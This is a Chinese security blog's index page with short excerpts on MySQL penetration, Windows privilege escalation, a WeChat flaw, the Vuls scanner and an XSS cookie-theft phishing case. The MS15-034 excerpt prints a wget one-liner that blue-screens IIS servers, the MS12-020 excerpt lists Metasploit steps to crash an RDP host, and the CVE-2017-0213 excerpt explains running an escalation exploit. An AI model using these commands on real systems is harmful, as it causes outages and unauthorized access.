Mysql数据库渗透及漏洞利用总结

2017-12-11 Mr.linus 信息安全

Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但技术的进步有无止境,思想有多远,路就可以走多远,在研究mysql数据库安全之余,对Mysql如何通过msf、sqlmap等来进行扫描、漏洞...

阅读全文>>

标签: 漏洞 数据库 mysql 渗透

评论(0) 浏览(339)

通过Windows 10中的Guest帐户获取管理员权限

2017-6-15 Mr.linus 信息安全

演示视频 操作步骤 打开命令行窗口,使用命令“whoami”来检查当前Windows用户账号的状态。 当前账户的用户名为“joe”,账户状态为“DefaultAccount”,即非管理员账号类型。 使用命令“net user”尝试更改为管理员账号“administrator”,此时你将会看到错误信息“Access is denied”,即访问被拒绝。 现在,从我们的GitHub库中下载漏洞利用程序“CVE-2017-0213_x64”【下载地址】,下载完成后在本地解压文件,此时你会得到一个.exe可执行文件,然后双击运行它。 ...

阅读全文>>

标签: 漏洞 提权 管理员

评论(1) 浏览(932)

微信远程任意代码执行漏洞

2016-8-23 Mr.linus 信息安全

近日,360手机卫士阿尔法团队(Alpha Team)独家发现微信远程任意代码执行漏洞,将其命名为badkernel。360手机卫士阿尔法团队发现,通过此漏洞攻击者可获取微信的完全控制权,危及用户朋友圈、好友信息、聊天记录甚至是微信钱包,可使上亿微信用户受到影响,危害巨大。目前,阿尔法团队的相关研究人员已经将此漏洞报告给腾讯应急响应中心并提供了修复建议。 图1: 360手机卫士独家发现微信重大漏洞 或影响数亿用户  360手机卫士阿尔法团队研究发现,利用badkernel漏洞可以进行准蠕虫式的传播,单个用户微信中招后可通过发送朋友圈和...

阅读全文>>

标签: 漏洞 微信 任意代码

评论(1) 浏览(976)

工具推荐:Vuls,一款优秀的Linux漏洞扫描器

2016-4-13 Mr.linus 软件工具

摘要 对于系统管理员来说,每天进行安全漏洞分析和软件更新是每日必需的基本活动。为了避免生产环境中的故障,对系统管理员来说选择不使用由保管理器提供的自动更新选项并执行手动更新非常常见。但是这会导致以下问题的发生: 1、系统管理员必需不断提防NVD(国际漏洞数据库)中所有新的安全漏洞等。对于系统管理员来说 2、如果在服务器上安装了大量的软件,那么监控所有的软件基本是不可能的。 3、通过执行分析来确定被漏洞影响的服务器需要付出高昂的代价。在分析过程中忽略一两个服务器是很正常的。 Vuls是解决以上问题的工具。它具有...

阅读全文>>

标签: 漏洞 linux

评论(0) 浏览(2673)

使用QQ邮箱漏洞盗取iCloud解锁失窃iPhone团伙溯源

2015-11-26 Mr.linus 信息安全

在《QQ邮箱0day漏洞,打开邮件iCloud被盗案例分析》http://bobao.360.cn/learning/detail/2262.html中,360天眼安全实验室揭露了一起利用未公开QQ邮箱跨站漏洞进行的钓鱼攻击。接下来,我们对此事件做了进一步的挖掘,分析谁是可能的幕后黑手。 我们发现攻击者至少使用了两种攻击方式进行钓鱼:利用跨站漏洞窃取Cookies、伪装iCloud登录页面。 1、利用跨站漏洞钓取Cookie 攻击者会发一封带有XSS漏洞的邮件,目标点击后,会把QQ邮箱的Cookies发到攻击者的后台,攻击者收到Cookie...

阅读全文>>

标签: 漏洞 iCloud

评论(0) 浏览(1489)

MS15-034:HTTP.sys 远程代码执行漏洞利用

2015-11-20 Mr.linus 信息安全

只需一条命令请求可导致服务器蓝屏 wget –header=”Range: bytes=18-18446744073709551615″  http:127.0.0.1/t.img  

阅读全文>>

标签: 漏洞 代码执行

评论(0) 浏览(1981)

MS12-020漏洞利用

2015-11-20 Mr.linus 信息安全

攻击目标 192.168.68.200 加载ms12_020模块 设置IP地址     set RHOST 192.168.68.200 设置端口地址 set RPORT 3389   执行之后 理论上目标机器已经蓝屏 ,已断开连接  

阅读全文>>

标签: 漏洞

评论(0) 浏览(1197)

Powered by Mr.Linus 蜀ICP备16005020号